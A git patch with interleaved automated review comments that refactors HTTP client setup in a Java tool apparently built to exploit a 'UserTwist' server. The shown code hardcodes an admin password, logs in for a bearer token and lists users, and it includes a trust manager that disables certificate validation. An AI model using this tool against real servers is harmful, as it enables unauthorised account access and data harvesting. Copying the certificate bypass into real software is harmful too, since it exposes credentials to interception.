From d08de128b29ba11662cbad1f6db5ce7cea65b031 Mon Sep 17 00:00:00 2001
From: Mateo
Date: Fri, 2 Aug 2024 14:21:57 +0200
Subject: [PATCH] Create HttpClient in Request constructor
---
 src/fr/motysten/usertwist/exploit/Main.java | 12 ++++++------
 src/fr/motysten/usertwist/exploit/tools/Request.java | 11 +++++++----
 2 files changed, 13 insertions(+), 10 deletions(-)
diff --git a/src/fr/motysten/usertwist/exploit/Main.java b/src/fr/motysten/usertwist/exploit/Main.java
index 6c74f54..f90780b 100644
--- a/src/fr/motysten/usertwist/exploit/Main.java
+++ b/src/fr/motysten/usertwist/exploit/Main.java
@@ -24,12 +24,14 @@ public class Main {
 public static String password = "AdminSecret1C";
 public static String port = "443";
 public static int rotation = 4;
- public static boolean insecure = false;
 public static boolean asynchronous = true;
+ public static Request requestClient;
 public static void main(String[] args) throws IOException, InterruptedException, NoSuchAlgorithmException, KeyManagementException {
 BufferedReader reader = new BufferedReader(new InputStreamReader(System.in));
+ requestClient = new Request(false);
+
 if (Arrays.asList(args).contains("--synchronous") || Arrays.asList(args).contains("-s")) {
 asynchronous = false;
 }
@@ -69,7 +71,7 @@ public class Main {
 boolean tokenFound = false;
 while (!tokenFound) {
 try {
- response = Request.get(link, port, "/login", requestJSON, null, insecure);
+ response = requestClient.get(link, port, "/login", requestJSON, null);
 if (response.statusCode() == 308) {
 System.err.println("The server is trying to force HTTPS use. Would you like to retry with HTTPS ? [Y/n]");
 if (reader.readLine().equalsIgnoreCase("n")) {
@@ -88,7 +90,7 @@ public class Main {
 System.err.println("Operation aborted ! Security failure.");
 System.exit(1);
 } else {
- insecure = true;
+ requestClient = new Request(true);
 }
 } catch (SSLException e) {
 if (e.getMessage().contains("plaintext connection?")) {
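Review bot: In the `@@ -24,12 +24,14 @@` hunk of Main.java, the new field `public static Request requestClient;` is public and non-final, so any class can replace the object that decides whether certificate validation is on. Nothing visible in this patch reads it from outside `Main`, so `private static Request requestClient;` would keep the swap confined to the one place that asks the operator for confirmation. A one-line comment such as `// replaced by a non-validating client only after the operator confirms` would also explain why the field cannot be final. The body of `main` continues outside the hunk.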
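Review bot: In the `@@ -88,7 +90,7 @@` hunk, `requestClient = new Request(true);` replaces the client for the rest of the run and is never switched back. The `/references` call in the `@@ -124,7 +124,7 @@` hunk therefore sends its `Authorization: Bearer` header through a client built with the `SSLBypass` trust manager. Presumably that manager accepts any certificate (its body is not on this page), in which case the login data and the token are readable by whoever terminates the connection. I would state that scope to the operator right after the assignment, e.g. `System.err.println("Certificate validation is disabled for all further requests.");`. The enclosing try/catch starts and ends outside the hunk.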
@@ -108,8 +110,6 @@ public class Main {
 System.exit(1);
 }
- System.out.println(response.statusCode());
-
 JSONObject responseObject = new JSONObject(response.body());
 String token = responseObject.optString("token");
@@ -124,7 +124,7 @@ public class Main {
 Map headers = new HashMap<>();
 headers.put("Authorization", "Bearer " + token);
- response = Request.get(link, port, "/references", requestJSON, headers, insecure);
+ response = requestClient.get(link, port, "/references", requestJSON, headers);
 JSONArray usersArray = new JSONArray(response.body());
 System.out.println(usersArray.length() + " users found !");
diff --git a/src/fr/motysten/usertwist/exploit/tools/Request.java b/src/fr/motysten/usertwist/exploit/tools/Request.java
index f720cda..795c402 100644
--- a/src/fr/motysten/usertwist/exploit/tools/Request.java
+++ b/src/fr/motysten/usertwist/exploit/tools/Request.java
@@ -16,16 +16,19 @@ import java.util.Map;
 public class Request {
- public static HttpResponse get(String link, String port, String endpoint,JSONObject params, Map headers, boolean insecure) throws NoSuchAlgorithmException, KeyManagementException, IOException, InterruptedException {
- HttpClient client = HttpClient.newHttpClient();
+ private final HttpClient client;
+ public Request(boolean insecure) throws NoSuchAlgorithmException, KeyManagementException {
+ HttpClient.Builder builder = HttpClient.newBuilder();
 if (insecure) {
 SSLContext customContext = SSLContext.getInstance("TLS");
 customContext.init(null, new TrustManager[]{new SSLBypass()}, new SecureRandom());
-
- client = HttpClient.newBuilder().sslContext(customContext).build();
+ builder.sslContext(customContext);
 }
+ this.client = builder.build();
+ }
+ public HttpResponse get(String link, String port, String endpoint,JSONObject params, Map headers) throws IOException, InterruptedException {
 HttpRequest.Builder builder = HttpRequest.newBuilder(URI.create(link + ":" + port + endpoint));
 if (headers != null) {
 for (Map.Entry header : headers.entrySet()) {
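Review bot: The new constructor `Request(boolean insecure)` is undocumented, and a bare `true` at the call site gives no hint that it installs an `SSLContext` whose only trust manager is `SSLBypass`. I would put a Javadoc comment above it, e.g. `/** @param insecure when true, the client uses the SSLBypass trust manager instead of the default trust store; pass true only after explicit operator confirmation. */`. Because `client` is now `final`, the comment should also say that an instance is either validating or non-validating for its whole lifetime. The body of `get` continues past the end of the hunk.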